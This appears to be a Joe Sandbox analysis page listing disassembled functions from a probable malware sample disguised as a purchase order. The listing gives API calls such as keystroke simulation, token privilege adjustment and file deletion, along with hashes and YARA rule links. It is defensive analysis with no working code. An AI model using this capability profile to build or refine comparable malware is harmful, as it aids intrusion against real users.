Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Library$Free$Load
String ID:
API String ID: 2391024519-0
Opcode ID: bdc7bc1839d97ab04ecd5fd31589a7babd8fc0f1fafcf12f2688e08ee6139e99
Instruction ID: 1f80cfd2d09e1638bed56b013e730591200b4cfe8bff1834d2c9f7d5b423193b
Opcode Fuzzy Hash: bdc7bc1839d97ab04ecd5fd31589a7babd8fc0f1fafcf12f2688e08ee6139e99
Instruction Fuzzy Hash: A011C871700206AADB10BB71DC06B9E77A99FC0748F10847EF656B61C1DB789A059B58

Function 00479B45 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 00479B51

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 1de68fc35cfaf652e3383879fa389902897bbb6150a75f3ec4224c709fbbe5cf
Instruction ID: a3e8d651301d5cdfce25b2048ede81e560c51bdd0112b26095fcab813be825f0
Opcode Fuzzy Hash: 1de68fc35cfaf652e3383879fa389902897bbb6150a75f3ec4224c709fbbe5cf
Instruction Fuzzy Hash: CC2146705082018FDB24DF25C444B5ABBE1BF84308F14896EF59A4B362C779F886CF5A

Function 0042AF61 Relevance: 1.6, APIs: 1, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

___lock_fhandle.LIBCMT ref: 0042AFC0

Part of subcall function 00427BDA: __getptd_noexit.LIBCMT ref: 00427BDA

Part of subcall function 00427C0E: __getptd_noexit.LIBCMT ref: 00427C0E

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: __getptd_noexit$___lock_fhandle
String ID:
API String ID: 1144279405-0
Opcode ID: 11c00ffc3f7456b8b7639cd1d23e0bdfdcc4dcbab5d0a08258685fbd082b0570
Instruction ID: 72f555c6501e1ce87cd012baef782597da69394b83e16657c689296a690b0a37
Opcode Fuzzy Hash: 11c00ffc3f7456b8b7639cd1d23e0bdfdcc4dcbab5d0a08258685fbd082b0570
Instruction Fuzzy Hash: B711B672B046308FD7127FA5B90175A7B609F42339F96424AE4705B1E2CBBC9D008BAE

Function 00AB6086 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32 ref: 00AB608C

Memory Dump Source

Source File: 00000000.00000002.2072069896.0000000000AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: ff274b9b901517ccfe501b5a2682be08e668cdd6e77a1f6f2abeaa8aab47e341
Instruction ID: 5795f379ffda854187e78de3b8cb619d796d7aa9d6cc714e9125621e421c79c1
Opcode Fuzzy Hash: ff274b9b901517ccfe501b5a2682be08e668cdd6e77a1f6f2abeaa8aab47e341
Instruction Fuzzy Hash: 910192B1C0D7409ECB259B3994143F6BBBC7F56320F09C79AE4859B1A3D6788C04DB52

Function 004039DB Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 6835a613e9910970744cf47f90ff2063449a5087be5f2ce099398601ed1c7b70
Instruction ID: e462a9ed68780897a26be5b7c37f438fac53c332684aae35b8fe6951bdcf7267
Opcode Fuzzy Hash: 6835a613e9910970744cf47f90ff2063449a5087be5f2ce099398601ed1c7b70
Instruction Fuzzy Hash: 9D018671500109EECF04EF65C8918FEBF78AF20344F00806FB515A71E5EA349A49DF68

Function 00422AAE Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 00422AED

Part of subcall function 00427C0E: __getptd_noexit.LIBCMT ref: 00427C0E

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: __getptd_noexit__lock_file
String ID:
API String ID: 2597487223-0
Opcode ID: 75817c05e41aff18e0b5dc307dc2a24adc95069273b999b4acbc6a7d50f9e70f
Instruction ID: 5589abf0bb1310eb904447484f268859338ac04dd37c0e0a6a4a15a0a52f55d4
Opcode Fuzzy Hash: 75817c05e41aff18e0b5dc307dc2a24adc95069273b999b4acbc6a7d50f9e70f
Instruction Fuzzy Hash: 3CF0C231700225BADF21AF76AD023DF3AA1BF40318F96442BB4149B191C7BC8A52DB59

Function 00404252 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,?,?,?,004039FE,?,00000001), ref: 00404286

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: aa9df2f1f3d3afe1309460d4fe78f022ae08662da92f8d56ef81b65362027b2c
Instruction ID: 74f35774a27debaa66b6be3da2798f9a4b53b6784b46458f95cdd3b3f822c893
Opcode Fuzzy Hash: aa9df2f1f3d3afe1309460d4fe78f022ae08662da92f8d56ef81b65362027b2c
Instruction Fuzzy Hash: 65F0A0B0605301CFCB349F60D484816B7F0BF443653208ABFF2C692650C3399840DF44

Function 004040A7 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 004040C6

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: LongNamePath
String ID:
API String ID: 82841172-0
Opcode ID: 9d95857b7837f52a5ea900d0463dd10bf0ab9cd554c9ff5156831bebcfff610c
Instruction ID: 0290631fc8dec078d58f0ec9d0cf7d10399dccf95bf213d32d7819efeea1db69
Opcode Fuzzy Hash: 9d95857b7837f52a5ea900d0463dd10bf0ab9cd554c9ff5156831bebcfff610c
Instruction Fuzzy Hash: 9BE07D326001241BC711A254CC46FEE73ACDF8C6A4F050079F905E3244DA7499808794

Function 00C118A8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?), ref: 00C118B3

Memory Dump Source

Source File: 00000000.00000002.2073056889.0000000000C10000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
Instruction ID: 08fa8cd05aa4ed30775089d030b4ae62505f7ad9087db845e6c7c48e9a0293dc
Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
Instruction Fuzzy Hash: 41E08C3092920CEBEF10CAAAC904AE973A8AB06320F148654AE16C32C0D6388E90F750

Function 00C11878 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?), ref: 00C11883

Memory Dump Source

Source File: 00000000.00000002.2073056889.0000000000C10000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
Instruction ID: 17bd363b51c38d23d5a0e6f24398599a9ef78655465cfbc12e1369f9a90a73c3
Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
Instruction Fuzzy Hash: D0D05E3091520CEBDB10CAB4D9049E973A8DB06320F108765EE15832C0D5359A40A750

Function 00C13274 Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000001F4), ref: 00C13289

Memory Dump Source

Source File: 00000000.00000002.2073056889.0000000000C10000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction ID: 352b242676a210c9ba98b2f91a7b230a8f1a1251b78f4586efc19ea558914ddb
Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction Fuzzy Hash: 07E0BF7494010DEFDB00EFA4D5496DD7BB4EF04301F1005A1FD05E7680DB309E549A62

Function 00C13278 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000001F4), ref: 00C13289

Memory Dump Source

Source File: 00000000.00000002.2073056889.0000000000C10000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: 829b11700779844831ae7bdc656bb6e894db5f76a453b2ad9ec3642e701586a8
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: F1E0E67494010DDFDB00EFB4D5496DD7BB4EF04301F100161FD01E2380D6309E509A62

Non-executed Functions

Function 0046F7FF Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 630windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 0041B34E: GetWindowLongW.USER32(?,000000EB), ref: 0041B35F

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 0046F87D
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0046F8DC
GetWindowLongW.USER32(?,000000F0), ref: 0046F919
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0046F940
SendMessageW.USER32 ref: 0046F966
_wcsncpy.LIBCMT ref: 0046F9D2
GetKeyState.USER32(00000011), ref: 0046F9F3
GetKeyState.USER32(00000009), ref: 0046FA00
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0046FA16
GetKeyState.USER32(00000010), ref: 0046FA20
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0046FA4F
SendMessageW.USER32 ref: 0046FA72
SendMessageW.USER32(?,00001030,?,0046E059), ref: 0046FB6F
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 0046FB85
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0046FB96
SetCapture.USER32(?), ref: 0046FB9F
ClientToScreen.USER32(?,?), ref: 0046FC03
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0046FC0F
InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 0046FC29
ReleaseCapture.USER32 ref: 0046FC34
GetCursorPos.USER32(?), ref: 0046FC69
ScreenToClient.USER32(?,?), ref: 0046FC76
SendMessageW.USER32(?,00001012,00000000,?), ref: 0046FCD8
SendMessageW.USER32 ref: 0046FD02
SendMessageW.USER32(?,00001111,00000000,?), ref: 0046FD41
SendMessageW.USER32 ref: 0046FD6C
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0046FD84
SendMessageW.USER32(?,0000110B,00000009,?), ref: 0046FD8F
GetCursorPos.USER32(?), ref: 0046FDB0
ScreenToClient.USER32(?,?), ref: 0046FDBD
GetParent.USER32(?), ref: 0046FDD9
SendMessageW.USER32(?,00001012,00000000,?), ref: 0046FE3F
SendMessageW.USER32 ref: 0046FE6F
ClientToScreen.USER32(?,?), ref: 0046FEC5
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0046FEF1
SendMessageW.USER32(?,00001111,00000000,?), ref: 0046FF19
SendMessageW.USER32 ref: 0046FF3C
ClientToScreen.USER32(?,?), ref: 0046FF86
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0046FFB6
GetWindowLongW.USER32(?,000000F0), ref: 0047004B

Strings

@GUI_DRAGID, xrefs: 0046FBCC
F, xrefs: 0046FF42

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$F
API String ID: 2516578528-4164748364
Opcode ID: 2aaf0d4ff1e0b62b7564d47e689dc03fe02b96b8525f76bf8316570806902b86
Instruction ID: cc02e03bbf0bf54211185d3ef7d393deee0c208a90fc515681584bca93a84043
Opcode Fuzzy Hash: 2aaf0d4ff1e0b62b7564d47e689dc03fe02b96b8525f76bf8316570806902b86
Instruction Fuzzy Hash: 3832CA70604244EFDB10DF64D880FAABBA4FF49358F040A6AF695872A1E734DC49CB5A

Function 0046AACE Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 574windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0046B1CD

Strings

%d/%02d/%02d, xrefs: 0046AEFC

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: MessageSend
String ID: %d/%02d/%02d
API String ID: 3850602802-328681919
Opcode ID: a27592c881a657b5441291af43dd5bbc45d9cb53dfa069db71dbb672f16901a1
Instruction ID: 34171e6ab594a03bc3671029e554b35f8d6d1caf128c67eefd81c7f472873446
Opcode Fuzzy Hash: a27592c881a657b5441291af43dd5bbc45d9cb53dfa069db71dbb672f16901a1
Instruction Fuzzy Hash: 5812BF71600218ABEB248F65CC49FAF7BB4FF45710F10412BF915EA2D1EB789942CB5A

Function 0041EB42 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,00000000), ref: 0041EB4A
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00473AEA
IsIconic.USER32(000000FF), ref: 00473AF3
ShowWindow.USER32(000000FF,00000009), ref: 00473B00
SetForegroundWindow.USER32(000000FF), ref: 00473B0A
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00473B20
GetCurrentThreadId.KERNEL32 ref: 00473B27
GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00473B33
AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00473B44
AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00473B4C
AttachThreadInput.USER32(00000000,?,00000001), ref: 00473B54
SetForegroundWindow.USER32(000000FF), ref: 00473B57
MapVirtualKeyW.USER32(00000012,00000000), ref: 00473B6C
keybd_event.USER32(00000012,00000000), ref: 00473B77
MapVirtualKeyW.USER32(00000012,00000000), ref: 00473B81
keybd_event.USER32(00000012,00000000), ref: 00473B86
MapVirtualKeyW.USER32(00000012,00000000), ref: 00473B8F
keybd_event.USER32(00000012,00000000), ref: 00473B94
MapVirtualKeyW.USER32(00000012,00000000), ref: 00473B9E
keybd_event.USER32(00000012,00000000), ref: 00473BA3
SetForegroundWindow.USER32(000000FF), ref: 00473BA6
AttachThreadInput.USER32(000000FF,?,00000000), ref: 00473BCD

Strings

Shell_TrayWnd, xrefs: 00473AE5

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 9641c01d01e40d42ee8f5cf71437ba4774e896593e718536b9572676ccf2a4f5
Instruction ID: 1542eb62d84d10236645d43e5eed5a01f98071e92a17b919d6b928d05aac1c3f
Opcode Fuzzy Hash: 9641c01d01e40d42ee8f5cf71437ba4774e896593e718536b9572676ccf2a4f5
Instruction Fuzzy Hash: 68319871E402187BEB206F758C49FBF7F6CEB44B50F10442AFA05EA1D1D6B46D01ABA8

Function 0043ACC5 Relevance: 37.0, APIs: 17, Strings: 4, Instructions: 223COMMON

Download Yara Rule

APIs

Part of subcall function 0043B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0043B180
Part of subcall function 0043B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0043B1AD
Part of subcall function 0043B134: GetLastError.KERNEL32 ref: 0043B1BA

_memset.LIBCMT ref: 0043AD08
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 0043AD5A
CloseHandle.KERNEL32(?), ref: 0043AD6B
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 0043AD82
GetProcessWindowStation.USER32 ref: 0043AD9B
SetProcessWindowStation.USER32(00000000), ref: 0043ADA5
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0043ADBF

Part of subcall function 0043AB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0043ACC0), ref: 0043AB99
Part of subcall function 0043AB84: CloseHandle.KERNEL32(?,?,0043ACC0), ref: 0043ABAB

Strings

winsta0, xrefs: 0043AD7D
default, xrefs: 0043ADBA
, xrefs: 0043AD17
H*K, xrefs: 0043AE40

Memory Dump Source

Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $H*K$default$winsta0
API String ID: 2063423040-3138276786
Opcode ID: 38613da18dc200c50bfc1ad8898ab6467531432f294876abbfdca12682cab3bc
Instruction ID: f7ddd2b72f6753a7b4a817440186c9bb792b9598968c157161328d8252a4d608
Opcode Fuzzy Hash: 38613da18dc200c50bfc1ad8898ab6467531432f294876abbfdca12682cab3bc
Instruction Fuzzy Hash: 8581B271841209AFDF11DFA4CC45AEF7B79EF08308F04512AF964A22A1D7398E64DB69

Function 004460DD Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 174filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00446EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00445FA6,?), ref: 00446ED8

Part of subcall function 00446EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00445FA6,?), ref: 00446EF1

Part of subcall function 0044725E: __wsplitpath.LIBCMT ref: 0044727B
Part of subcall function 0044725E: __wsplitpath.LIBCMT ref: 0044728E

Part of subcall function 004472CB: GetFileAttributesW.KERNEL32(?,00446019), ref: 004472CC

_wcscat.LIBCMT ref: 00446149
_wcscat.LIBCMT ref: 00446167
__wsplitpath.LIBCMT ref: 0044618E
FindFirstFileW.KERNEL32(?,?), ref: 004461A4
_wcscpy.LIBCMT ref: 00446209
_wcscat.LIBCMT ref: 0044621C
_wcscat.LIBCMT ref: 0044622F
lstrcmpiW.KERNEL32(?,?), ref: 0044625D
DeleteFileW.KERNEL32(?), ref: 0044626E
MoveFileW.KERNEL32(?,?), ref: 00446289
MoveFileW.KERNEL32(?,?), ref: 00446298
CopyFileW.KERNEL32(?,?,00000000), ref: 004462AD
DeleteFileW.KERNEL32(?), ref: 004462BE
FindNextFileW.KERNEL32(00000000,00000010), ref: 004462E1
FindClose.KERNEL32(00000000), ref: 004462FD
FindClose.KERNEL32(00000000), ref: 0044630B

Strings

\*.*, xrefs: 00446138, 00446147, 00446165

Memory Dump Source

